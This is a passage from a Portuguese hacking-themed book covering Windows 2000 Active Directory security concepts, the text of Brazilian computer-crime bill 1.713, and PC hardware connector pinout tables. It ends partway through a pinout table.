• O Active Directory suporta um número muito maior de objetos de usuário (mais de 1 milhão de objetos) com melhor performance que o registry. O tamanho do domínio individual não está mais limitado a performance do repositório de conta de segurança. Uma árvore de domínios conectados pode suportar estruturas organizacionais bem maiores e complexas.
• Administração da informação de conta é melhorada com o uso
Terrorismo Tecnológico Aprenda Para Sobreviver
392
de ferramentas gráficas avançadas para gerenciamento do Active Directory, assim como através de suporte OLE DS para linguagens de script. Podem ser implementadas tarefas comuns com o uso de batch scripts para automatizar a administração.
• Serviços de replicação de diretório suportam múltiplas cópias de informação de conta, sendo que podem ser feitas atualizações em qualquer cópia, não somente no controlador de domínio primário designado. O suporte a Lightweight Directory Access Protocol (LDAP) e sincronização de diretório proporcionam os mecanismos para ligar o diretório Windows com outros diretórios da empresa.
Armazenar informação de conta de segurança no Active Directory significa que os usuários e grupos são representados como objetos no diretório. Acesso de leitura e escrita aos objetos no diretório pode ser dado ao objeto como um todo, ou para propriedades individuais do objeto. Administradores possuem controle refinado sobre quem pode atualizar informação de usuário e de grupo. Por exemplo, um grupo de operadores de Telecom pode receber o acesso de escrita somente para propriedades de conta de usuário relacionadas a equipamento telefônico do escritório, sem a necessidade de receberem privilégios completos de Conta Operador ou Administrador. O conceito de um grupo também é simplificado porque grupos locais e globais são representados por objetos de grupo no diretório. Interfaces de programação existentes para acesso a grupo local ainda são suportadas para compatibilidade completa com o passado. Entretanto, grupos definidos no diretório podem ser usados para controle de acesso em todo o domínio, a recursos ou somente para propósitos de administração local no controlador de domínio.
Relacionamento entre Diretório e Serviços de Segurança Existe uma relação fundamental entre o Active Directory e os Serviços de segurança integrados no sistema operacional Windows 2000. O Active Directory armazena informação de política de segurança de domínio—tais como restrições de senha a todo o domínio e privilégios de acesso ao sistema—que possuem influência direta no uso do sistema. Objetos relacionados a segurança no diretório devem ser administrados de maneira segura para evitar
Terrorismo Tecnológico Aprenda Para Sobreviver
393
alterações não autorizadas que afetam a segurança geral do sistema. O sistema operacional Windows 2000 implementa modelo de segurança baseado em objeto e controle de acesso para todos os objetos no Active Directory. Todo objeto no Active Directory possui um descritor de segurança único que define permissões de acesso necessárias para ler ou atualizar as propriedades do objeto. O diagrama abaixo mostra o relacionamento fundamental entre o Active Directory e os serviços de segurança do sistema operacional.
Active DirectoryStores security policyand accountinformation
Operating systemImplements securitymodel on all objectsTrusts informationstored securely in thedirectory
Active Directory
Windows 2000 Server
Directory and Security Services
Figura 2. Relacionamento entre o Active Directory e os serviços de Segurança
O Active Directory usa imitação e verificação de acesso Windows 2000 para determinar se um cliente Active Directory pode ler ou atualizar o objeto desejado. Isto significa que o cliente LDAP pede ao diretório que acione o sistema operacional para reforçar controle de acesso, ao invés do próprio Active Directory ter que tomar decisões de controle de acesso. O modelo de segurança do Windows 2000 proporciona uma implementação unificada e consistente de controle de acesso a todos os recursos de domínio, baseado na participação em grupo.
Terrorismo Tecnológico Aprenda Para Sobreviver
394
Componentes de segurança do Windows 2000 podem confirmar a informação relacionada a segurança armazenada no diretório. Por exemplo, o serviço de autenticação do Windows 2000 armazena informação de senha encriptada em uma porção segura do diretório de objetos de usuário. O sistema operacional confirma que esta informação de política de segurança está armazenada de maneira segura e que as restrições de conta ou participação em grupo não são alteradas por ninguém sem acesso autorizado. Em adição, informação de política de segurança para gerenciamento geral de domínio é mantida no diretório. Esta relação fundamental da Segurança e o Active Directory é atingida somente através da completa integração do diretório com o sistema operacional Windows 2000, e não está disponível de outra forma.
Relações de Confiança de Domínio Domínios do Windows 2000 podem ser organizados em uma árvore hierárquica de domínio. As relações de confiança entre domínios permitem que usuários sem contas definidas no domínio, sejam autenticados por servidores de recursos em outro domínio. No Windows NT 4.0 e em versões anteriores, relações de confiança interdomínios são definidas por contas de domínio relações de confiança em uma viaentre controladores de domínio. O gerenciamento de relações de confiança entre domínios de contas e domínios de recursos em uma rede grande é uma tarefa complexa. O Active Directory suporta duas formas de relações de confiança: • Relações de confiança em uma via explícitas a domínios
Windows NT 4.0. • Relações de confiança em duas vias transitivas entre domínios
que são parte da árvore de domínio do Windows 2000. O diagrama abaixo mostra os dois estilos de relação de confiança.
Terrorismo Tecnológico Aprenda Para Sobreviver
395
Domain
Domain Domain
Domain
Domain
DownlevelDomain
Explicit NT4-style Trusts
Microsoft.Com
FarEast. Microsoft. Com
Kerberos Trust
Europe. Microsoft. Com
Domain Trust Relationships
Figura 3. Relações de confiançade domínios
Confianças transitivas entre domínios simplifica o gerenciamento de contas confiávis interdomínios. Domínios que são membros da árvore de domínio definem uma relação de confiança em duas vias com o domínio pai na árvore. Todos os domínios implicitamente confirmam outros domínios na árvore. Se existem domínios específicos que não querem relação de confiança em duas vias, contas de relações de confiança em uma via explícitas podem ser definidas. Para organizações com múltiplos domínios, o número geral de relações de confiança em uma via explícitos é reduzido de maneira significativa.
Delegação de Administração Delegação de administração é uma ferramenta de valor para as organizações confinarem a administração de segurança para aplicação somente em subconjuntos definidos do domínio inteiro da organização. O requisito importante é conceder direitos para administrar um pequeno conjunto de usuários ou grupos nas suas áreas de responsabilidade e, ao mesmo tempo, não dar permissões para contas de gerenciamento em outras partes da organização. Delegação de responsabilidade para criar usuários ou grupos é
Terrorismo Tecnológico Aprenda Para Sobreviver
396
definida no nível da unidade organizacional (OU), ou container, onde as contas são criadas. Administradores de grupo para uma unidade organizacional não possuem necessariamente a habilidade de criar e gerenciar contas para outra unidade organizacional em um domínio. Entretanto, configurações de política para todo o domínio e direitos de acesso definidos em níveis superiores na árvores de diretório podem ser aplicados usando herança de direitos de acesso. Há três maneiras de definir a delegação de responsabilidades de administração: • Delegar permissões para alterar propriedades em um recipente
particular, tal como o LocalDomainPolicies do próprio objeto de domínio.
• Delegar permissões para criar e deletar objetos filho de um tipo específico embaixo de uma OU, tal como Usuários, Grupos ou Impressoras.
• Delegar permissões para atualizar propriedades específicas em objetos filho de um tipo específicos embaixo de uma OU; por exemplo o direito de configurar senhas em objetos Usuário.
A interface de usuário do Directory Service Administration facilita a visualização de informação delegada definida para recipientes. Também é fácil adicionar novas delegações de permissões, através da seleção de para quem você deseja delegar permissão, e a escolha de quais permissões eles precisam. A integração do repositório de contas de segurança com o Active Directory proporciona benefícios reais para administrar uma empresa. Performance, facilidade de administração e escalabilidade para grandes organizações são o resultado direto. Empresas baseadas na Internet podem usar árvores de domínio e OUs hierárquicas para organizar contas para parceiros de negócio, clientes assíduos ou fornecedores com direitos de acesso específicos aos seus sistemas.
Direitos de Acesso Refinado Grandes organizações dependem tipicamente de muitos indivíduos ou grupos para garantir e gerenciar a infraestrutura de conta de rede. Eles precisam da habilidade de conceder direitos de acesso a operações específicas—tais como limpar senhas de usuário ou desabilitar contas—para grupos específicos sem conceder
Terrorismo Tecnológico Aprenda Para Sobreviver
397
permissão de criar novas contas ou alterar outras propriedades de contas de usuário. A arquitetura de segurança para objetos do Active Directory usa descritores de segurança do Windows 2000 para controlar o acesso a objetos. Cada objeto no diretório possui um descritor de segurança único. A Lista de Controle de Acesso (ACL) no descritor de segurança é uma lista de entradas que concedem ou negam direitos de acesso específico a usuários ou grupos. Direitos de acesso podem ser concedidos ou negados com níveis de escopo diferentes no objeto. Direitos de acesso podem ser definidos em qualquer um dos seguintes níveis: • Aplicar ao objeto como um todo, que significa a aplicação a todas
as propriedades do objeto. • Aplicar a um grupo de propriedades definidas por conjuntos de
propriedade no objeto. • Aplicar a uma propriedade individual do objeto. Conceder acesso uniforme de leitura/escrita a todas as propriedades de um objeto é a permissão de acesso padrão para o criador do objeto. Conceder ou negar permissões de acesso a objeto a um conjunto de propriedades, é uma maneira conveniente de definir permissões a um grupo de propriedades relacionadas. O agrupamento de propriedades é definido pelo atributo de conjunto de propriedades de uma propriedades no esquema. A relação do conjunto de propriedades pode ser customizada através da alteração do esquema. Finalmente, a definição de direitos de acesso em um nível por propriedade proporciona o mais alto nível de granularidade de permissões. Definição de acesso por propriedade está disponível em todos os objetos no Active Directory. Objetos de recipente no diretório também suportam acesso refinado com respeito a quem possui permissões para criar objetos filho e quais tipos de objeto filho eles podem criar. Por exemplo, o controle de acesso definido em uma unidade organizacional (OU) pode definir quem pode criar objetos Usuário (contas) neste container. Outra entrada no controle de acesso para a OU pode definir quem pode criar objetos Impressora. Controle de acesso refinado nos recipientes do diretório é uma maneira efetiva de manter a organização do espaço de nomes do diretório. Uma nova implementação do Editor de Lista de Controle de Acesso
Terrorismo Tecnológico Aprenda Para Sobreviver
398
(ACL), o controle de diálogo comum para visualização ou alteração de permissões de segurança de objeto, proporciona uma interface fácil de usar para a definição de direitos de acesso para objetos do Active Directory, através de conjunto de propriedades ou propriedades individuais. O Editor ACL também suporta a definição de direitos de acesso herdados em objetos de container que são válidos para todos os sub-objetos naquela porção da árvore de diretório.
Herança de Direitos de Acesso Herança de direitos de acesso refere-se a como a informação de controle de acesso definida em recipientes de mais alto nível do diretório, se espalha para subrecipientes e objetos folha. Geralmente há dois modelos para a implementação de herança de direitos de acesso: herança dinâmica e estática. Herança dinâmica determina os direitos de acesso efetivos a um objeto através da avaliação das permissões definidas explicitamente no objeto e das permissões definidas para todos os objetos pai no diretório. Isto permite flexibilidade para alterar o controle de acesso em porções da árvore de diretório através de alterações específicas no container que afetam automaticamente todos os subrecipientes e objetos folha. O custo desta flexibilidade é o custo de performance para avaliar direitos de acesso efetivos na hora que um cliente requisita uma operação de leitura/escrita em um objeto de diretório específico. Windows 2000 implementa uma forma estática de herança de direitos de acesso, referenciada como herança Create Time. Pode ser definida a informação de controle de acesso que se espalha para objetos filho do container. Quando o objeto filho é criado, os direitos de herança do recipente são misturados aos direitos de acesso padrão no novo objeto. Quaisquer mudanças nos direitos de acesso herdados em níveis superiores da árvore devem ser propagadas para todos os objetos filho afetados. Novos direitos de acesso herdados são propagados pelo Active Directory para os objetos aos quais eles se aplicam, baseado em opções para como os novos direitos são definidos. Performance para verificação de controle de acesso é bem rápida com o uso do modelo estático de herança de direitos de acesso. O sistema operacional é projetado para otimizar verificações de acesso, operações necessárias e freqüentes, não somente para o
Terrorismo Tecnológico Aprenda Para Sobreviver
399
objeto de diretório, mas também para os arquivos de sistema e todos os outros objetos de sistema do Windows 2000. Windows 2000 suporta múltiplos protocolos de segurança de rede porque cada protocolo proporciona compatibilidade para clientes existentes, mecanismos de segurança mais efetivos ou funcionalidades de interoperabilidade para redes heterogêneas como a Internet. Há muitos protocolos de autenticação nas redes corporativas atualmente, e a arquitetura Windows 2000 não limita quais protocolos podem ser suportados. Um protocolo de segurança que atenda todas as necessidades deveria ser mais simples, mas as configurações de redes, de pequenas empresas a provedores de conteúdo Internet de larga escala, não compartilham os mesmos requisitos de segurança. Os clientes precisam poder escolher como integrar nova tecnologia de segurança, tal como senhas dinâmicas ou criptografia de chave pública, nos seus ambientes computacionais. Windows 2000 é projetado para suportar múltiplos protocolos de segurança, um elemento essencial para o ambiente computacional distribuído de hoje. Usando APIs de segurança Win32® de propósito geral, o sistema operacional isola as aplicações suportadas dos detalhes dos diferentes protocolos de segurança disponíveis. Interfaces de aplicação de mais alto nível proporcionada por RPC e DCOM Autenticados proporciona abstrações baseadas em parâmetros de interface para usar serviços de segurança. A infraestrutura de segurança do Windows 2000 suporta estes protocolos primários de segurança: • O protocolo de autenticação do Windows NT LAN Manager
(NTLM) é usado pelo Windows NT 4.0 e versões anteriores do Windows NT. NTLM continuará a ser suportado e usado para autenticação de rede pass-through, acesso de arquivo remoto e conexões RPC autenticadas a versões anteriores do Windows NT.
• O protocolo de autenticação Kerberos Versão 5 substitui o NTLM como o protocolo de segurança primário para acesso a recursos nos domínios Windows 2000. O protocolo de autenticação Kerberos é um padrão de indústria maduro que possui vantagens
Terrorismo Tecnológico Aprenda Para Sobreviver
400
para autenticação de rede Windows. Alguns dos benefícios do protocolo Kerberos são autenticação mútua do cliente e servidor, carga de servidor reduzida durante o estabelecimento de conexão, e suporte a delegação de autorização de clientes para servidores através do uso de mecanismos proxy.
• Distributed Password Authentication (DPA) é o protocolo de autenticação secreto compartilhado usado por algumas das maiores organizações da Internet, tais como a MSN e CompuServe. Este protocolo de autenticação faz parte dos serviços Microsoft Commercial Internet System (MCIS) e é projetado especificamente para usuários utilizarem a mesma senha Internet para conectar a qualquer número de sites Internet que são parte da mesma organização. Os servidores de conteúdo da Internet usam o serviço de autenticação MCIS como um serviço Internet de retaguarda, e os usuários podem conectar-se a múltiplos sites sem ter que redigitar suas senhas.
• Protocolos baseados em chave pública proporcionam privacidade e confiabilidade sobre a Internet. SSL é o padrão de fato atualmente para conexões entre browsers Internet e servidores de informação Internet. (Uma definição de protocolo padrão IETF baseada em SSL3 é conhecida correntemente por Transport Layer Security Protocol, ou TLS). Estes protocolos, que usam certificados de chave pública para autenticar clientes e servidores, dependem de uma infraestrutura de chave pública para amplo uso. Windows NT 4.0 proporciona serviços de segurança de canal seguro que implementam os protocolos SSL/PCT. Segurança no Windows 2000 possui suporte melhorado a protocolos de chave pública, o que está descrito a seguir neste documento.
Terrorismo Tecnológico Aprenda Para Sobreviver
401
Segurança corporativa depende da flexibilidade de usar os mecanismos de segurança certos quando necessário. Computação corporativa continuará a depender de uma ampla faixa de serviços de rede proporcionados por servidores remotos de arquivo e impressão, servidores de aplicações de negócio e dados, e data warehouse e ambientes de processamento transacionais. Suporte a múltiplos protocolos de segurança de rede permite que o Windows 2000 Professional e o Windows 2000 Server hospedem uma variedade de serviços de rede em adição as tecnologias baseadas na Internet. O diagrama seguinte mostra o suporte de arquitetura para múltiplos protocolos de segurança implementados no Windows 2000 usando
a Security Support Provider Interface (SSPI).
Secure RPCSecure RPC HTTPHTTP
SSPISSPI
Internet Explorer,Internet Explorer,Internet InformationInternet Information
ServerServer
NTLMNTLM KerberosKerberos SChannelSChannelSSL/TLSSSL/TLS
MSV1_0/MSV1_0/ SAM SAM
KDC/KDC/DirectoryDirectory
DCOMDCOMapplicationapplication
DPADPA
MembershipMembershipservicesservices
POP3, NNTPPOP3, NNTP
Mail,Mail,Chat,Chat,NewsNews
CIFS/SMBCIFS/SMB
RemoteRemotefilefile
Architecture For MultipleAuthentication Services
LDAPLDAP
DirectoryDirectoryenabled appsenabled appsusing ADSIusing ADSI
Figura 4. Arquitetura para Múltiplos Serviços de Autenticação
O Security Support Provider Interface é uma API Win32 de sistema usada por muitas aplicações e serviços de sistema—tais como o
Terrorismo Tecnológico Aprenda Para Sobreviver
402
Internet Explorer (IE) e Internet Information Server (IIS)—para isolar protocolos de nível aplicação de protocolos de segurança usados para autenticação de rede. Provedores de segurança usam credenciais diferentes para autenticar o usuário, ou certificados secretos compartilhados ou de chave pública. Os protocolos de segurança interagem com diferentes serviços de autenticação e armazéns de informação de conta. • O provedor de segurança NTLM usa o serviço de autenticação
MSV1_0 e o serviço NetLogon em um controlador de domínio, para autenticação cliente e informação de autorização.
• O provedor de segurança Kerberos conecta a um Key Distribution Center (KDC) online e ao armazém de conta Active Directory para tickets de sessão.
• DPA usa os serviços de segurança MCIS para autenticação membership e informação de acesso específica de servidor.
• Serviços de canal seguro são baseados em certificados de chave pública emitidos por Autoridades Certificadoras trusted; eles não exigem um servidor de autenticação online.
O S.O. Server possui varias vantagens pois pode trabalhar com protocolos múltiplos, e com chaves de critografia avançadas,
autentificador kerberus, entre outras tecnologias que ajudam a proteger a segurança do Sistema. Mas como vimos isso só não basta há de se pensar em todas as possibilidades possíveis de
ataques sendo nos cabso no servidor, nos micros dos usuários... Para informação mais recente sobre Windows 2000 e Windows NT Server, visite o Web site http://www.microsoft.com/ntserver e o Windows NT Server Fórum na Microsoft Network (GO WORD: MSNTS). Para mais informação sobre o Windows 2000 Active Directory, veja o white paper, Microsoft Windows NT Active Directory Technical
Terrorismo Tecnológico Aprenda Para Sobreviver
403
Summary. Informação adicional sobre segurança Microsoft Internet está disponível no Web site http://www.microsoft.com/security. Informação adicional sobre a arquitetura de segurança Windows NT, Security Support Provider Interface, CryptoAPI e APIs de segurança do Windows NT está disponível nas referências online para a Plataforma SDK Microsoft. As partes retiradas do site da Microsoft tiveram a Revisão Técnica por Giuliano Pasquale – Seminar Group Microsoft Brasil
Terrorismo Tecnológico Aprenda Para Sobreviver
405
Projeto de Lei 1.713 - Substitutivo - versão final - Dez Dispõe sobre os crimes de informática e dá outras providências
O Congresso Nacional decreta:
22.1 DOS PRINCÍPIOS QUE REGULAM A
PRESTAÇÃO DE SERVIÇO POR REDES DE COMPUTADORES
Art. 1º. O acesso, o processamento e a disseminação de informações através das redes de computadores devem estar a serviço do cidadão e da sociedade, respeitados os critérios de garantia dos direitos individuais e coletivos e de privacidade e segurança de pessoas físicas e jurídicas e da garantia de acesso às informações disseminadas pelos serviços da rede. Art. 2º. É livre a estruturação e o funcionamento das redes de computadores e seus serviços, ressalvadas as disposições específicas reguladas em lei. 22.2 DO USO DE INFORMAÇÕES DISPONÍVEIS EM COMPUTADORES OU REDES DE COMPUTADORES
Art. 3º. Para fins desta lei, entende-se por informações privadas aquelas relativas a pessoa física ou jurídica identificada ou identificável. Parágrafo Único: É identificável a pessoa cuja individuação não envolva custos ou prazos desproporcionados. Art. 4º. Ninguém será obrigado a fornecer informações sobre sua pessoa ou de terceiros, salvo nos casos previstos em lei. Art. 5º. A coleta, o processamento e a distribuição, com finalidades comerciais, de informações privadas ficam sujeitas à prévia aquiescência da
Terrorismo Tecnológico Aprenda Para Sobreviver
406
pessoa a que se referem, que poderá ser tornada sem efeito a qualquer momento, ressalvando-se o pagamento de indenizações a terceiros, quando couberem. § 1º. A toda pessoa cadastrada dar-se-á conhecimento das informações privadas armazenadas e das respectivas fontes. § 2º. Fica assegurado o direito à retificação de qualquer informação privada incorreta. § 3º. Salvo por disposição legal ou determinação judicial em contrário, nenhuma informação privada será mantida à revelia da pessoa a que se refere ou além do tempo previsto para a sua validade. § 4º. Qualquer pessoa, física ou jurídica, tem o direito de interpelar o proprietário de rede de computadores ou provedor de serviço para saber se mantém informações a seu respeito, e o respectivo teor. Art. 6º. Os serviços de informações ou de acesso a bancos de dados não distribuirão informações privadas referentes, direta ou indiretamente, a origem racial, opinião política, filosófica, religiosa ou de orientação sexual, e de filiação a qualquer entidade, pública ou privada, salvo autorização expressa do interessado. Art. 7º. O acesso de terceiros, não autorizados pelos respectivos interessados, a informações privadas mantidas em redes de computadores dependerá de prévia autorização judicial.
22.3 DOS CRIMES DE INFORMÁTICA Dano a dado ou programa de computador Art. 8º. Apagar, destruir, modificar ou de qualquer forma inutilizar, total ou parcialmente, dado ou programa de computador, de forma indevida ou não autorizada. Pena: detenção, de um a três anos e multa.
Terrorismo Tecnológico Aprenda Para Sobreviver
407
Parágrafo único. Se o crime é cometido: I - contra o interesse da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos; II - com considerável prejuízo para a vítima; III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro; IV - com abuso de confiança; V - por motivo fútil; VI - com o uso indevido de senha ou processo de identificação de terceiro; ou VII - com a utilização de qualquer outro meio fraudulento. Pena: detenção, de dois a quatro anos e multa Acesso indevido ou não autorizado Art. 9o. Obter acesso, indevido ou não autorizado, a computador ou rede de computadores. Pena: detenção, de seis meses a um ano e multa. Parágrafo primeiro. Na mesma pena incorre quem, sem autorização ou indevidamente, obtém, mantém ou fornece a terceiro qualquer meio de identificação ou acesso a computador ou rede de computadores. Parágrafo segundo. Se o crime é cometido: I - com acesso a computador ou rede de computadores da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos; II - com considerável prejuízo para a vítima;
Terrorismo Tecnológico Aprenda Para Sobreviver
408
III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro; IV - com abuso de confiança; V - por motivo fútil; VI - com o uso indevido de senha ou processo de identificação de terceiro; ou VII - com a utilização de qualquer outro meio fraudulento. Pena: detenção, de um a dois anos e multa. Alteração de senha ou mecanismo de acesso a programa de computador ou dados Art. 10o. Apagar, destruir, alterar, ou de qualquer forma inutilizar, senha ou qualquer outro mecanismo de acesso a computador, programa de computador ou dados, de forma indevida ou não autorizada. Pena: detenção, de um a dois anos e multa. Obtenção indevida ou não autorizada de dado ou instrução de computador Art. 11o. Obter, manter ou fornecer, sem autorização ou indevidamente, dado ou instrução de computador. Pena: detenção, de três meses a um ano e multa. Parágrafo único. Se o crime é cometido: I - com acesso a computador ou rede de computadores da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;
Terrorismo Tecnológico Aprenda Para Sobreviver
409
II - com considerável prejuízo para a vítima; III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro; IV - com abuso de confiança; V - por motivo fútil; VI - com o uso indevido de senha ou processo de identificação de terceiro; ou VII - com a utilização de qualquer outro meio fraudulento. Pena: detenção, de um a dois anos e multa Violação de segredo armazenado em computador, meio magnético de natureza magnética, optica ou similar Art. 12o. Obter segredos, de indústria ou comércio, ou informações pessoais armazenadas em computador, rede de computadores, meio eletrônico de natureza magnética, óptica ou similar, de forma indevida ou não autorizada. Pena: detenção, de um a três anos e multa. Criação, desenvolvimento ou inserção em computador de dados ou programa de computador com fins nocivos Art. 13o. Criar, desenvolver ou inserir, dado ou programa em computador ou rede de computadores, de forma indevida ou não autorizada, com a finalidade de apagar, destruir, inutilizar ou modificar dado ou programa de computador ou de qualquer forma dificultar ou impossibilitar, total ou parcialmente, a utilização de computador ou rede de computadores. Pena: reclusão, de um a quatro anos e multa.
Terrorismo Tecnológico Aprenda Para Sobreviver
410
Parágrafo único. Se o crime é cometido: I - contra a interesse da União, Estado, Distrito Federal. Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos; II - com considerável prejuízo para a vítima; III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro; IV - com abuso de confiança; V - por motivo fútil; VI - com o uso indevido de senha ou processo de identificação de terceiro; ou VII - com a utilização de qualquer outro meio fraudulento. Pena: reclusão, de dois a seis anos e multa. Veiculação de pornografia através de rede de computadores Art. 14o. Oferecer serviço ou informação de caráter pornográfico, em rede de computadores, sem exibir, previamente, de forma facilmente visível e destacada, aviso sobre sua natureza, indicando o seu conteúdo e a inadequação para criança ou adolescentes. Pena: detenção, de um a três anos e multa.
22.4 DAS DISPOSIÇÕES FINAIS Art. 15o. Se qualquer dos crimes previstos nesta lei é práticado no exercício de atividade profissional ou funcional, a pena é aumentada de um sexto até a metade.
Terrorismo Tecnológico Aprenda Para Sobreviver
411
Art. 16o. Nos crimes definidos nesta lei somente se procede mediante representação do ofendido, salvo se cometidos contra o interesse da União, Estado, Distrito Federal Município, órgão ou entidade da administração direta ou indireta, empresa concessionária de serviços públicos, fundações instituídas ou mantidas pelo poder público, serviços sociais autônomos, instituições financeiras ou empresas que explorem ramo de atividade controlada pelo poder público, casos em que a ação é pública incondicionada. Art. 17o. Esta lei regula os crimes relativos à informática sem prejuízo das demais cominações previstas em outros diplomas legais. Art. 18o. Esta lei entra em vigor 30 (trinta) dias a contar da data de sua publicação. Art. 19o. Revogam-se todas as disposições em contrário.
Terrorismo Tecnológico Aprenda Para Sobreviver
412
Extras Uteis. Hackers sempre usam os conceitos físicos e lógicos da computação para conseguir o que querem. Como pheacker é preciso conhecer a parte de transmissão de dados, como os conectores e partes ligadas a energia elétrica nos pc´s. Como hacker é importante saber o que o micro está dizendo através de sons ou configurações de setup quando são feitos os vírus, então agora alguns guias muito úteis para vcs ☺
Terrorismo Tecnológico Aprenda Para Sobreviver
413
CONECTORES
CONECTORES(guia de conectores) COM1/COM2 RS-232 PORTA SERIAL ( DB-9 - DB25 ) CONECTOR DO BARRAMENTO ISA CONECTOR DO BARRAMENTO PCI ETHERNET 10/100 BASE-T ( RJ-45 ) FLOPPY DRIVE FONTE AT FONTE ATX GAME CONECTOR IDE HARD DRIVE KEYBOARD CONECTOR KEYBOARD E MOUSE CONECTOR ( MINI-DIN - PS2 ) PORTA PARALELA ( DB-25 ) SCSI USB VGA ( DB-15 )
IDE HARD DRIVE CONECTOR
PINO SINAL PINO SINAL 1 IDE RESET 2 GND 3 DATA 7 4 DATA 8 5 DATA 6 6 DATA 9 7 DATA 5 8 DATA 10 9 DATA 4 10 DATA 11 11 DATA 3 12 DATA 12 13 DATA 2 14 DATA 13 15 DATA 1 16 DATA 14 17 DATA 0 18 DATA 15 19 GND SINAL 20 N/C 21 N/C 22 GND
IDE MACHO
Terrorismo Tecnológico Aprenda Para Sobreviver
414
23 I/O WRITE 24 GND 25 I/O READ 26 GND 27 I/O CHANNEL
READY 28 N/C
29 HDACKO 30 GND 31 IRQ 14 32 IOCS16 33 ADDR 1 34 N/C 35 ADDR 0 36 ADDR 2 37 HARD DISK
SELECT 0 38 HARD DISK
SELECT 1 39 IDE ACTIVE 40 GND
FLOPPY DRIVE CONECTOR
PINO SINAL PINO SINAL 1 GND 2 DENSITY
SELECT 3 GND 4 N/C 5 GND 6 N/C 7 GND 8 INDEX 9 GND 10 MOTOR 0 11 GND 12 DRIVE
SELECT 1 13 GND 14 DRIVE
SELECT 0 15 GND 16 MOTOR 1 17 GND 18 DIRECTION 19 GND 20 STEP
FDC MACHO
Terrorismo Tecnológico Aprenda Para Sobreviver
415
21 GND 22 WRITE DATA
23 GND 24 WRITE GATE
25 GND 26 TRACK 0 27 GND 28 WRITE
PROTECT 29 GND 30 READ DATA31 GND 32 HEAD
SELECT 33 GND 34 DISK
CHANGE
FONTE AT
corpino SINAL
1 POWER GOOD -5V
2 +5V 3 +12V 4 -12V 5 GND 6 GND 7 GND 8 GND 9 -5V 10 +5V 11 +5V 12 +5V
Terrorismo Tecnológico Aprenda Para Sobreviver
416
FONTE ATX
+3.3V +3.3V -12V +3.3V GND GND PS/ON +5V GND GND GND +5V GND GND -5V POWER
OK +5V 5 VSB +5V
12V
PORTA PARALELA LPT1, LPT2 ( CONECTOR DB-25 )
PINO SINAL 1 Estrobe 2 D0 - Bit de dados 0 3 D1 - Bit de dados 1 4 D2 - Bit de dados 2 5 D3 - Bit de dados 3 6 D4 - Bit de dados 4 7 D5 - Bit de dados 5 8 D6 - Bit de dados 6 9 D7 - Bit de dados 7 10 ACK - Confirmação 11 BUSY - Ocupada 12 PE - Fim do papel 13 SLCT - Seleção
DB25 FÊMEA
Terrorismo Tecnológico Aprenda Para Sobreviver
417
14 AUTOFDXT - Avanço automático
15 Erro 16 INIT - Inicialização da
impressora 17 SLCTIN - Seleção de
entrada 18 a 25
0V -Terra
SCSI CONECTOR
PINO FUNCTION PINO FUNCTION1 SD+12 35 SD-12 2 SD+13 36 SD-13 3 SD+14 37 SD-14 4 SD+15 38 SD-15 5 SD+1 39 SD-1 6 SD+0 40 SD-0 7 SD+1 41 SD-1 8 SD+2 42 SD-2 9 SD+3 43 SD-3 10 SD+4 44 SD-4 11 SD+5 45 SD-5
SCSI FÊMEA
Terrorismo Tecnológico Aprenda Para Sobreviver
418
12 SD+6 46 SD-6 13 SD+7 47 SD-7 14 SDP+0 48 SD-0 15 GND 49 GND 16 DIFS 50 SENIN 17 TPWEX 51 TPWEX 18 TPWEX 52 TPWEX 19 N/C 53 NC 20 GND 54 GND 21 SATN+ 55 SATN- 22 GND 56 GND 23 SBSY+ 57 SBSY- 24 SACK+ 58 SACK- 25 SRST+ 59 SRST- 26 SMSG+ 60 SMSG- 27 SSEL+ 61 SSEL- 28 SCD+ 62 SCD- 29 SREQ+ 63 SREQ- 30 SIO+ 64 SIO- 31 SD+8 65 SD-8 32 SD+9 66 SD-9 33 SD+10 67 SD-10 34 SD+11 68 SD-11
Terrorismo Tecnológico Aprenda Para Sobreviver
419
USB CONECTOR
PINO SINAL 1 +5V 3 UV+(+DATA)2 UV- (-
DATA) 4 GND CHASSI GND
USB TIPO A FEMÊA
USB TIPO B MACHO
VGA CONECTOR ( HD -15 )
PINO SINAL 1 VERMELHO 2 VERDE 3 AZUL 4 N/C 5 GND 6 GND (Rrtorno
vermelho) 7 GND (Retorno
verde ) 8 GND (Retorno azul
) 9 N/C 10 GND 11 N/C 12 SDA 13 SINCRONISMO
HORIZONTAL 14 SINCRONISMO
VERTICAL 15 SCK
VGA FÊMEA
Terrorismo Tecnológico Aprenda Para Sobreviver
420
ETHERNET 10/100 BASE-T ( RJ-45 CONECTOR )
PINO SINAL 1 TRANSMITE
DADOS + 2 TRANSMITE
DADOS - 3 RECEBE
DADOS + 4 N/C 5 N/C 6 RECEBE
DADOS - 7 N/C 8 N/C
COM1/COM2 RS-232 PORTA SERIAL ( DB-9 - DB25 )
DB 9
DB 25
PINO
SINAL
PINO
1 CD - Detecção da portadora
8
2 RXD - Recepção de dados
3
3 TXD - Transmissão de dados
2
DB9 MACHO
4 DTR -Terminal de
20
DB25 MACHO
Terrorismo Tecnológico Aprenda Para Sobreviver
421
dados pronto
5 GND -Terra do sinal
7
6 DSR - Data Set pronto
6
7 RTS - Solicitação de dados
4
8 CTS - Pronto para enviar
5
9 RI - Indicador de chamadas
22
KEYBOARD E MOUSE CONECTOR ( MINI-DIN - PS2 )
PINO SINAL 1 KEYBOARD
DATA 2 MOUSE
DATA 3 GND 4 +5 VCC 5 KEYBOARD
CLOCK 6 MOUSE
CLOCK
PS2 Fêmea
Terrorismo Tecnológico Aprenda Para Sobreviver
422
KEYBOARD CONECTOR
PINO SINAL1 CLK 2 DATA 3 RESET4 GND 5 +5
VCC
Keyboard Fêmea
GAME CONECTOR
PINO SINAL 1 + 5 VDC 2 BOTÃO 4
(A_PB1) 3 POSIÇÃO
0 (A_X) 4 GND 5 GND 6 POSIÇÃO
1 (A_Y) 7 BOTÃO 5
(A_PB2) 8 + 5 VDC 9 + 5 VDC 10 BOTÃO 6
(B_PB1) 11 POSIÇÃO
